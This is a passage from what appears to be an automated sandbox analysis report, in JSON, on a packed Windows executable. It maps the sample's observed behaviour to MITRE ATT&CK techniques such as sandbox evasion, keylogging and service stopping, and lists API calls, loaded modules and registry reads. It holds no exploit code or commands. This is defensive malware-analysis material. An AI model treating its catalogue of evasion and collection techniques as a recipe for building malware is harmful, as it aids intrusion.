"Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Services File Permissions Weakness", "attck_id": "T1574.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/010", "malicious_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify System Firewall", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 2, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 13}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "malicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 2, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Network Connections Discovery", "attck_id": "T1049", "attck_id_wiki": "https://attack.mitre.org/techniques/T1049", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Clipboard Data", "attck_id": "T1115", "attck_id_wiki": "https://attack.mitre.org/techniques/T1115", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 2, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "informative_identifiers_count": 1}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 3}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,push\t-1,push\t0x41a3e8,push\t0x411908,mov\teax, dword ptr fs:[0],push\teax,mov\tdword ptr fs:[0], esp,sub\tesp, 0x58,push\tebx,push\tesi,push\tedi,mov\tdword ptr [ebp - 0x18], esp,call\tdword ptr [0x41a190],xor\tedx, edx,mov\tdl, ah,mov\tdword ptr [0x42f11c], edx,mov\tecx, eax,and\tecx, 0xff,mov\tdword ptr [0x42f118], ecx,shl\tecx, 8,add\tecx, edx,mov\tdword ptr [0x42f114], ecx,shr\teax, 0x10,mov\tdword ptr [0x42f110], eax,xor\tesi, esi,push\tesi,call\t0x4142fa,pop\tecx,test\teax, eax,jne\t0x412013,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetProcAddress\" with a parameter IsProcessorFeaturePresent (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetProcAddress\" with a parameter Process32First (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetProcAddress\" with a parameter Process32Next (UID: 00000000-00005952)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"1300140054f47676@RPCRT4.dll\"\n \"15001600c03e476a@ADVAPI32.dll\"\n \"0e000f00703f476a@ADVAPI32.dll\"\n \"0e000f00cc3f476a@ADVAPI32.dll\"\n \"11001200b447476a@ADVAPI32.dll\"\n \"110012004848476a@ADVAPI32.dll\"\n \"120013008c48476a@ADVAPI32.dll\"\n \"12001300e448476a@ADVAPI32.dll\"\n \"14001500386e476a@ADVAPI32.dll\"\n \"14001500506e476a@ADVAPI32.dll\"\n \"14001500686e476a@ADVAPI32.dll\"\n \"17001800806e476a@ADVAPI32.dll\"\n \"0d000e00986e476a@ADVAPI32.dll\"\n \"11001200a86e476a@ADVAPI32.dll\"\n \"11001200bc6e476a@ADVAPI32.dll\"\n \"0d000e004466476a@WININET.dll\"\n \"0d000e00b466476a@WININET.dll\"\n \"10001100ec66476a@WININET.dll\"\n \"100011009067476a@WININET.dll\"\n \"10001100006f476a@WININET.dll\"\n \"10001100146f476a@WININET.dll\"\n \"14001500286f476a@WININET.dll\"\n \"14001500406f476a@WININET.dll\"\n \"12001300586f476a@WININET.dll\"\n \"120013006c6f476a@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e\" has an executable section named \"UPX0\"\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e\" has an executable section named \"UPX1\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e\" has an writable section named \"UPX0\"\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e\" has an writable section named \"UPX1\"\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e\" has an writable section named \"UPX2\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71ac0000\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" loaded module \"KERNEL32\" at base 771f0000\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a4b0000\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" loaded module \"KERNEL32.DLL\" at base 771f0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005952)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77140000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e\" was detected as \"Microsoft visual C++ 5.0\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" trying to access non-existent file \"C:\\VERSION.DLL\"\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" trying to access non-existent file \"C:\\Windows\\System32\\CHKSERV.EXE\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\MUI\\SETTINGS\"; Key: \"\"; Value: \"\")\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\LANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"\"; Value: \"\")\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" (Access type: 